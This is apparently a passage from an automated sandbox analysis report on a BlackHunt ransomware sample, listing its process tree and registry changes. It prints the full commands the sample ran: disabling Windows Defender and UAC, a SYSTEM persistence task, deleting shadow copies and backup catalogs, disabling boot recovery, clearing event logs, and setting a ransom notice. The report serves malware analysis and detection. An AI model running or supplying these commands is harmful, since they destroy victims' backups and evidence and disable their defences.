wrote to memory of 2892 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 105 PID 4564 wrote to memory of 4068 4564 cmd.exe 107 PID 4564 wrote to memory of 4068 4564 cmd.exe 107 PID 756 wrote to memory of 1252 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 106 PID 756 wrote to memory of 1252 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 106 PID 1080 wrote to memory of 4880 1080 cmd.exe 206 PID 1080 wrote to memory of 4880 1080 cmd.exe 206 PID 756 wrote to memory of 4236 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 109 PID 756 wrote to memory of 4236 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 109 PID 4120 wrote to memory of 2932 4120 cmd.exe 204 PID 4120 wrote to memory of 2932 4120 cmd.exe 204 PID 756 wrote to memory of 4804 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 203 PID 756 wrote to memory of 4804 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 203 PID 756 wrote to memory of 3464 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 129 PID 756 wrote to memory of 3464 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 129 PID 756 wrote to memory of 4788 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 128 PID 756 wrote to memory of 4788 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 128 PID 756 wrote to memory of 336 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 112 PID 756 wrote to memory of 336 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 112 PID 756 wrote to memory of 696 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 111 PID 756 wrote to memory of 696 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 111 PID 4576 wrote to memory of 1464 4576 cmd.exe 120 PID 4576 wrote to memory of 1464 4576 cmd.exe 120 PID 756 wrote to memory of 1960 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 119 PID 756 wrote to memory of 1960 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 119 PID 756 wrote to memory of 640 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 118 PID 756 wrote to memory of 640 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 118 PID 1252 wrote to memory of 2800 1252 cmd.exe 117 PID 1252 wrote to memory of 2800 1252 cmd.exe 117 PID 756 wrote to memory of 1600 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 116 PID 756 wrote to memory of 1600 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 116 PID 2892 wrote to memory of 2380 2892 cmd.exe 123 PID 2892 wrote to memory of 2380 2892 cmd.exe 123 PID 756 wrote to memory of 4924 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 124 PID 756 wrote to memory of 4924 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 124 PID 756 wrote to memory of 3260 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 127 PID 756 wrote to memory of 3260 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 127 PID 756 wrote to memory of 2696 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 130 PID 756 wrote to memory of 2696 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 130 PID 4236 wrote to memory of 2292 4236 cmd.exe 132 PID 4236 wrote to memory of 2292 4236 cmd.exe 132 PID 756 wrote to memory of 4296 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 138 PID 756 wrote to memory of 4296 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 138 PID 756 wrote to memory of 4024 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 135 PID 756 wrote to memory of 4024 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 135 PID 4804 wrote to memory of 3500 4804 cmd.exe 137 PID 4804 wrote to memory of 3500 4804 cmd.exe 137 PID 756 wrote to memory of 1832 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 201 PID 756 wrote to memory of 1832 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 201 PID 756 wrote to memory of 5004 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 200 PID 756 wrote to memory of 5004 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 200 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe"C:\Users\Admin\AppData\Local\Temp\33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:336
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:640
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3260
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:4788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4296
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1344
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:9412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:9092
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe" /F2⤵PID:2860
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe" /F3⤵
- Creates scheduled task(s)
PID:7024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4840
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:9488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3432
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5232
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5288
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5208
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2108
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5408
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4420
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:8108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4540
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:8120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:5004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:7436
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:7484
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:13884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:6780
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:13992
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:7744
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:6420
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7592
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3700
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:828
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4128
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:14732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12324
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:12948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:8500
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:8952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:8276
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:8188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:9756
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:64
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:5836
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe"2⤵PID:13704
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:7748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8552 -
